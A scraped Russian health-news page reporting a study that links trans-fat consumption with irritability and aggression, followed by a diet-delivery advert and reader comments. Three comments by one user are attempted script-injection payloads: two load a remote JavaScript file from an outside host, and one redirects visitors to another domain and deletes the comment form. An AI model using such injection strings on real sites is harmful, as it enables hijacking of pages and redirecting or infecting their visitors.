Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Жирная еда делает вас сте...  >>  Жирная еда делает вас стервой!
 
Обратная связь
 

Жирная еда делает вас стервой!

Размер шрифта
20 октября 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Оказывается, правильное питание и ограничение потребления жиров – это не только залог здоровья, но и залог хорошего поведения. Как показало недавнее исследование, употребление в пищу транс-жирных кислот может привести к повышенной раздражительности и даже агрессии.

Жирная еда делает вас стервой!

В исследовании приняли участие 945 мужчин и женщин. В нем впервые были получены данные о связи транс-жиров и отклонений в поведении, начиная от простой нетерпимости и вплоть до агрессии. «Существуют работы, которые доказывают связь употребления омега-3 жирных кислот с повышением покладистости и низкой импульсивностью. Есть также данные о том, что транс-жиры препятствуют образованию длинных цепей омега-3 кислот, которые оказывают положительное влияние на головной мозг. Это подтолкнуло нас к проведению нового исследования транс-жиров», – рассказывает доктор Беатрис Голомб из Университета Калифорнии, ведущий автор работы.

Участники эксперимента не принимали никаких препаратов или добавок, содержащих жиры. Также критериями включения в исследования были отсутствие диабета, онкологических заболеваний и болезней сердца. Средний возраст участников составил 57 лет. Потребление транс-жиров составило около 3,49 грамм в сутки (от 1,02 до 5,96 грамм).

Для сбора данных ученые пользовались подробным опросником питания, а также специальными шкалами для оценки поведения, раздражительности и уровня агрессии. Они обнаружили, что люди, употреблявшие больше транс-жиров, набирали значительно больше баллов по каждой из этих шкал. «Обнаруженная нами закономерность была даже более выражена, чем уже давно известная связь между агрессией и мужским полом, молодым возрастом и употреблением алкоголя», – отмечает доктор Голомб.

Карен Дэвидсон из Университета Ванкувера, Канада, считает, что результаты этой работы еще раз доказывают вредное влияние искусственных транс-жирных кислот и что необходимо уменьшить их количество в пище. «Мы не должны забывать о том, что производители продуктов не делают различий между натуральными и искусственными транс-жирами. Однако они отличаются химически, и нам нужно изучить влияние каждого из них на поведение», – говорит Карен.

Доктор Олвин Каррасильо, глава отделения терапии Университета Майами, добавляет: «Пока мы не можем утверждать, что употребление транс-жиров ведет к агрессивному поведению. Однако уже сейчас имеются данные о том, что большое количество транс-жиров в рационе может привести к возникновению заболеваний сердца и некоторых видов опухолей».

Доктор Каррасильо также добавил, что людям необходимо снизить потребление транс-жиров с едой: «К примеру, в ресторанах Нью-Йорка введено ограничение на количество транс-жиров в блюдах».

Так что если хотите похудеть и наладить отношения с супругом – специально для вас Диета Елены Малышевой. Уже готовая правильная еде без транс-жиров будет доставлена в любое удобное для вас место и время. Вам останется только худеть!

Другие материалы об ожирении и о тех смертоносных рисках для здоровья, которые оно несет, читайте на страницах нашего специального проекта «Сбрось лишнее».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - his shadow

20 октября 2014 в 16:09

Цитировать   |   Пожаловаться

=)
Не, меня делает стервой отсутствие жирной еды и эти статьи.

2 - Arturiya

20 октября 2014 в 23:51

Цитировать   |   Пожаловаться

Кажется это не то чего я ожидал

3 - qweqwe5435

31 октября 2014 в 22:33

Комментарий удален за нарушение Правил общения

4 - zzzzzz

30 июня 2015 в 18:31

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

5 - zzzzzz

30 июня 2015 в 21:32

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

6 - zzzzzz

30 июня 2015 в 22:27

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Выключите компьютер! Из-за него вы толстеете!   Кошмар! Сок нельзя пить, если хочешь быть красивой и стройной!   Перекус, который заставит вас купить штаны на размер меньше в Новом году   Даже свет во сне приводит к лишним килограммам! Как похудеть?!  
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 07 июня 2013Поможет ли зеленый чай похудеть?
 
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 

Слайдшоу

1
Как лишний вес влияет на ваши ноги и их красоту
Худшие советы для похудения. Часть 3
8 мелочей, которые помогут вам похудеть и не болеть

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.